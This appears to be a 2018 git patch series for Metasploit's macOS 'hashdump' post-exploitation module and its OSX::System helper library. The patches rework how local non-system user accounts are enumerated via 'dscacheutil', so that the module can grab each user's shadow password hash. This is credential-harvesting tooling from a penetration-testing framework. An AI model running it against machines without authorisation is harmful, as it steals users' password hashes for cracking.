From e1ec0ec8995c250e8819e89b8354f329edd5cc5e Mon Sep 17 00:00:00 2001 From: pwnforfun <38401374+pwnforfun@users.noreply.github.com> Date: Thu, 6 Sep 2018 12:00:36 +0200 Subject: [PATCH 1/3] hash_dump now working properly up to Mac OS X High Sierra (10.13.6 included) --- modules/post/osx/gather/hashdump.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 694414c958..9447ec3a20 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -8,7 +8,7 @@ require 'rexml/document' class MetasploitModule < Msf::Post # set of accounts to ignore while pilfering data - OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] + #OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] include Msf::Post::File include Msf::Post::OSX::Priv @@ -203,7 +203,10 @@ class MetasploitModule < Msf::Post # @return [Array] list of user names def users - @users ||= cmd_exec("/bin/ls /Users").each_line.collect.map(&:chomp) - OSX_IGNORE_ACCOUNTS + tmp = cmd_exec("dscacheutil -q user").split(/$/).map(&:strip) #- OSX_IGNORE_ACCOUNTS + res = Array.new() + tmp.each_with_index{ |val, index| res << val.split("name: ")[1] if val.include?("name: ") and tmp[index+1].include?("**")} + res end # @return [String] version string (e.g. 10.8.5) From c89d8f8fb7ef1f3ad540ed72429a482e59a98958 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 24 Sep 2018 22:17:32 -0500 Subject: [PATCH 2/3] fix user enumeration methods, be more robust --- lib/msf/core/post/osx/system.rb | 28 +++++++++++++++++----------- 1 file changed, 17 insertions(+), 11 deletions(-) diff --git a/lib/msf/core/post/osx/system.rb b/lib/msf/core/post/osx/system.rb index 51dccf89e2..ca59a54902 100644 --- a/lib/msf/core/post/osx/system.rb +++ b/lib/msf/core/post/osx/system.rb @@ -27,14 +27,15 @@ module Msf::Post::OSX::System def get_users cmd_output = cmd_exec("/usr/bin/dscacheutil -q user") users = [] - users_arry = cmd_output.split("\n\n") + users_arry = cmd_output.tr("\r", "").split("\n\n") users_arry.each do |u| entry = Hash.new u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp - + unless val.nil? + entry[field] = val.strip + end end users << entry end @@ -48,15 +49,17 @@ module Msf::Post::OSX::System def get_system_accounts cmd_output = cmd_exec("/usr/bin/dscacheutil -q user") users = [] - users_arry = cmd_output.split("\n\n") + users_arry = cmd_output.tr("\r", "").split("\n\n") users_arry.each do |u| entry = {} u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp + unless val.nil? + entry[field] = val.strip + end end - next if entry["name"] !~ /^_/ + next if entry["name"][0] != '_' users << entry end return users @@ -69,15 +72,17 @@ module Msf::Post::OSX::System def get_nonsystem_accounts cmd_output = cmd_exec("/usr/bin/dscacheutil -q user") users = [] - users_arry = cmd_output.split("\n\n") + users_arry = cmd_output.tr("\r", "").split("\n\n") users_arry.each do |u| entry = {} u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp + unless val.nil? + entry[field] = val.strip + end end - next if entry["name"] =~ /^_/ + next if entry["name"][0] == '_' users << entry end return users @@ -96,8 +101,9 @@ module Msf::Post::OSX::System u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp - + unless val.nil? + entry[field] = val.strip + end end groups << entry end From 3e61a98f25f84aeb5270268b7c5cbb125b67bc7c Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 24 Sep 2018 22:17:58 -0500 Subject: [PATCH 3/3] use non-system users for hashdump --- modules/post/osx/gather/hashdump.rb | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 9447ec3a20..e4ef62c25a 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -12,6 +12,7 @@ class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::OSX::Priv + include Msf::Post::OSX::System include Msf::Auxiliary::Report def initialize(info={}) @@ -44,7 +45,8 @@ class MetasploitModule < Msf::Post end # iterate over all users - users.each do |user| + get_nonsystem_accounts.each do |user_info| + user = user_info['name'] next if datastore['MATCHUSER'].present? and datastore['MATCHUSER'] !~ user print_status "Attempting to grab shadow for user #{user}..." if gt_lion? # 10.8+ @@ -201,16 +203,8 @@ class MetasploitModule < Msf::Post shadow_bytes.sub!(/^dsAttrTypeNative:ShadowHashData:/, '') end - # @return [Array] list of user names - def users - tmp = cmd_exec("dscacheutil -q user").split(/$/).map(&:strip) #- OSX_IGNORE_ACCOUNTS - res = Array.new() - tmp.each_with_index{ |val, index| res << val.split("name: ")[1] if val.include?("name: ") and tmp[index+1].include?("**")} - res - end - # @return [String] version string (e.g. 10.8.5) def ver_num - @version ||= cmd_exec("/usr/bin/sw_vers -productVersion").chomp + @product_version ||= get_sysinfo['ProductVersion'] end end